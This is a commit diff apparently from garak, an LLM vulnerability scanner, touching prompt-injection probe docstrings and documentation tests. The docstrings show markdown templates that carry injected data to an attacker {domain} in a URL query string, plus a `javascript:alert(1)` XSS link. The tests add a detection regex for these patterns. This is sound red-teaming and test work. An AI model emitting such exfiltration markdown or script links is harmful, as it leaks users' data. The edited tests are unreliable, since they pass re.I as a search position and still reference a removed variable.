docs: refine markdown checks

garak/probes/web_injection.py

@@ -359,7 +359,7 @@ class MarkdownURINonImageExfilExtended(MarkdownExfilMixin, garak.probes.Probe):
 
     .. code-block:: markdown
 
-       ``[Link display text]\(https://{domain}/logo.png?{var}=[{injection_marker}])``
+       ``[Link display text](https://{domain}/logo.png?{var}=[{injection_marker}])``
        ``[Link display text][ref]\\n\\n[ref]: https://{domain}/logo.png?{var}=[{injection_marker}]``
        ``[Link display text][ref]\\n[Link display text]: https://{domain}/logo.png?{var}=[{injection_marker}]``
        ``[Link display text][ref]\\n[Link display text]: https://{domain}/logo.png?{var}=[{injection_marker}]``
@@ -409,7 +409,7 @@ class MarkdownURIImageExfilExtended(MarkdownExfilMixin, garak.probes.Probe):
 
     .. code-block:: markdown
 
-       ``![Link display text]\(https://{domain}/logo.png?{var}=[{injection_marker}])``
+       ``![Link display text](https://{domain}/logo.png?{var}=[{injection_marker}])``
        ``![Link display text][ref]\\n\\n[ref]: https://{domain}/logo.png?{var}=[{injection_marker}]``
        ``![Link display text][ref]\\n\\n[Link display text]: https://{domain}/logo.png?{var}=[{injection_marker}]``
        ``![Link display text][ref]\\n\\n[Link display text]: https://{domain}/logo.png?{var}=[{injection_marker}]``
@@ -507,7 +507,7 @@ class MarkdownXSS(garak.probes.Probe):
     """Perform cross site scripting attacks using Markdown Javascript rendering via prompt injection.
 
     Relay javascript to be rendered by the target application via markdown JS rendering.
-    When the markdown `[link](javascript:alert(1))` is rendered as HTML, clicking the link will cause the javascript to
+    When the markdown ``[link](javascript:alert(1))`` is rendered as HTML, clicking the link will cause the javascript to
     trigger.
     """
 

tests/test_docs.py

@@ -20,8 +20,7 @@
 
 MARKDOWN_CANARIES = set(
     [
-        #        re.compile(r"\n\s*#\.?\s+.+\n"),  #  3. kjasdhfg
-        re.compile(r"\[.+\]\(http.+\)"),  #  (link)[http://link]
+        re.compile(r"(^|[^`!])\!?\[.+\]\((http|java).+\)"),  #  [link](http://link)
         re.compile(r"```"),  #  ```   (code block)
     ]
 )
@@ -165,7 +164,7 @@ def test_check_plugin_class_docstring(plugin_name: str):
     assert isinstance(doc, str), "All plugin classes must have docstrings"
     assert len(doc) > 0, "Plugin class docstrings must not be empty"
     for canary in MARKDOWN_CANARIES:
-        canary_match = canary.search(doc)
+        canary_match = canary.search(doc, re.I)
         assert (
             canary_match is None
         ), f"Markdown in docstring: '{canary_match.group().strip()}' - use ReStructured Text for garak docs"
@@ -184,7 +183,7 @@ def test_check_plugin_module_docstring(plugin_group: str):
     assert isinstance(doc, str), "All plugin groups/modules must have docstrings"
     assert len(doc) > 0, "Plugin group/module docstrings must not be empty"
     for canary in MARKDOWN_CANARIES:
-        canary_match = canary.search(doc)
+        canary_match = canary.search(doc, re.I)
         assert (
             canary_match is None
         ), f"Markdown in docstring: '{canary_match.group().strip()}' - use ReStructured Text for garak docs"
@@ -252,9 +251,9 @@ def test_doc_src_extensions(doc_source_entry):
 
 @pytest.mark.parametrize("rst_file", RST_FILES)
 def test_doc_src_no_markdown(rst_file):
-    src_file_content = open(rst_file, "r", encoding="utf-8").read()
-    for rx in MARKDOWN_CANARIES:
-        result = rx.search(src_file_content)
+    rst_file_content = open(rst_file, "r", encoding="utf-8").read()
+    for canary in MARKDOWN_CANARIES:
+        canary_match = canary.search(rst_file_content, re.I)
         assert (
-            result is None
+            canary_match is None
         ), f"Markdown-like content in rst: {result.group().strip()} use ReStructured Text for garak docs - Markdown won't render"